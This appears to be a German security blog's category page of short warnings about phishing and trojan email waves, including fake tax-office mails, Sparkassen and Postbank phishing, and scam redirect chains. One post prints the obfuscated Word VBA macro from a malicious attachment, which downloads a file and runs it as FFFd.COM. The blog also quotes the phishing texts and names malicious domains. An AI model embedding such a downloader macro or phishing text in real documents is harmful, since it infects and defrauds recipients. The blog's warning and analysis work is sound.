Melden der Seite auf der Google Safe Browsing Phishing-Meldeseite hat leider keine sofortige Wirkung.
Mehr vielleicht morgen. Gute Nacht!
Too much to write about everything!
In dieser Kategorie erscheinen Artikel über Viren, Würmer und anderes Getier, dass sich nicht nur in freier Natur findet.
Melden der Seite auf der Google Safe Browsing Phishing-Meldeseite hat leider keine sofortige Wirkung.
Mehr vielleicht morgen. Gute Nacht!
Wenn mir eine Fabienne Schulz eine Videobotschaft schreibt, dann doch bitte nur mir und nicht einem Thorsten W… Außerdem sollte sie wissen, dass Torsten nicht Fabienne Schulz heißt und sie selbst nicht „jemand“ ist, sondern Fabienne Schulz.
Wer in eine solch plumpe Falle tappt, der ist selber schuld.
Finger weg von solchen E-Mails. Insbesondere das der Flash-Player zur Zeit nicht koscher ist. Der Link führt allerdings über mehrere Umleitungen auf einen Fehler 403.
bit.ly/1vw1WmZ => dgnda.enmyas.su => b-unitd.com => tracker.brokeragecapital.com => bigprofitgenerator.com
Gute Nacht
„(WordPress) Blogs gehackt – Fortsetzung 1“ weiterlesen
Gestern waren einige E-Mails im Postfach, die angeblich vom Finanzamt stammen. Ich habe zwei verschiedene Texte gefunden. Gemein ist allem Mails, dass sie einen Anhang mit Namen Erklarung09201429.zip enthalten, wobei die Zahl differieren kann. Das Zip-Archiv ist jedoch zerstört. Bei mir zeigt ark ein leeres Inhaltsverzeichnis an und unzip -l meldet:
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
Damit ist der Trojaner soweit ich es beurteilen kann wirkungslos. Es sein denn, er nutzt eine Sicherheitslücke bei ZIP-Dateien unter Windows aus.
Ansonsten nichts neues. Hier noch der Text der E-Mails.
USt.-IdentNr.: DE13592
Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue (angebracht).
Ihre Datei finden Sie als D0C Datei im Anhang dieser E-Mail Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.
Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).
Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.
Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.
Mit freundlichen Grüßen
Ihr Finanzamt / Ihre Steuerverwaltung
HINWEIS:
Sie erhalten diese E-Mail, weil Sie bei der Datenübermittlung z.B. Ihrer Steuererklaerung die Mailbenachrichtigung auf diese E-Mailadresse gewünscht haben.
Bei Steuerbescheiden ist allein die Papierausfertigung rechtlich relevant.
Wir laden alle natürlichen und juristischen Personen für die Überprüfung durch und folgen Sie den Anweisungen des Inland Revenue.
Folgen Sie einfach der Beschilderung zu vermeiden, sich als Person „in Gefahr“ nach dem ersten Test berichtet.
Material für die Konsultation (MR) ist vor allem für diejenigen, die Finanzdienstleistungen nutzen zu empfehlen (zB. Internet-Banking).
——– Ihre Datei finden Sie als D0C-Datei im Anhang dieser E-Mail ——–
Sollten Sie die Daten nicht abholen, so werden diese nach 6 Monaten automatisch gelöscht.
Dies ist eine automatisch generierte E-Mail – bitte antworten Sie nicht an diese Mailadresse.
IdentNr: 4008371707
Mit freundlichen Grüßen
Ihr Finanzamt / Ihre Steuerverwaltung
elster.de
oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:
D. Bischof
Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.
Sub hui() Dim DMtjPKZbDiINOsDjnWMDQUaGD As String Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer URL = "http://www.example.com/fotos/rollover5.jpg" DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE") Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP") Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream") lOMwCMuTOYqPBHJNCl.Open "GET", URL, False lOMwCMuTOYqPBHJNCl.Send With CSGDWYMVOOBASEd .Type = 1 .Open .write lOMwCMuTOYqPBHJNCl.responseBody .SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2 End With Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM" End Sub
Unter der Adresse spkass.worldnet.us/update/ (IP: 94.249.139.6) ist zur Zeit wieder eine Sparkassen Online Banking Pishing Seite aktiv. Leider erkennen dies zur Zeit nur 3 von 53 Virenscannern. Über diese Mails habe ich bereits vor gut einem Jahr berichtet, deshalb erspare ich mir weitere Ausführungen zur Mail. Es hat sich im Prinzip nichts geändert.
Glücklicherweise hat jemand diesen Versuch schon erkannt und die Seite entfernt / umgelenkt.
skk-54278bf4a28221d672.yolasite.com is an alias for ddos-1476621086.us-east-1.elb.amazonaws.com. ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.243.34.189 ddos-1476621086.us-east-1.elb.amazonaws.com has address 54.235.94.176
[tawarning] Die MS-Word Dokumente scheinen sich einer neuen Beliebtheit als Viren und Trojanerschleuder zu erfreuen. Heute fand ich zwei E-Mails mit einer anderen Variante im Postfach. Der Text der E-Mails ist minimal: „Trojaner: MS Word Anhänge“ weiterlesen
[tawarning] Derzeit sind die Trojaner in verschiedenen Gewändern, meist getarnt als Rechnungen für irgendwelche Bestellungen, die man nicht getätigt hat.
[tawarning align=“right“] Word Makro Viren oder Trojaner habe ich schon lange nicht mehr gesehen – ihnen allerdings auch keine große Beachtung geschenkt. Heute haben kam folgende Mail in den Briefkasten:
„SPAM / Trojaner: Setzen Sie bitte mit uns in Verbindung“ weiterlesen
[tawarning align=“right“] Mit nur einem Bild und einen Link in der E-Mail versuchen die Betrüger ihre Opfer über das Mobile TAN-Verfahren der Postbank zu melken. Grundsätzlich setzt dies voraus, dass die Empfänger externe Inhalte wie Bilder automatisch nachladen lassen, was keine sichere Einstellung des Mail-Clients ist. Automatisches Nachladen, so praktisch es auch ist, gehört auf den Schrotthaufen der unsicheren Funktionen.
In diesem Artikel will ich kurz beschreiben, wie es weitergeht, wenn man den Anweisungen der Betrüger folgt.
Das obige Bild ersetzt den Text in einer Mail. Ziel ist, nicht als Spam erkannt zu werden.
Zur Dokumentation führe ich den Text aus dem E-Mail-Bild hier an: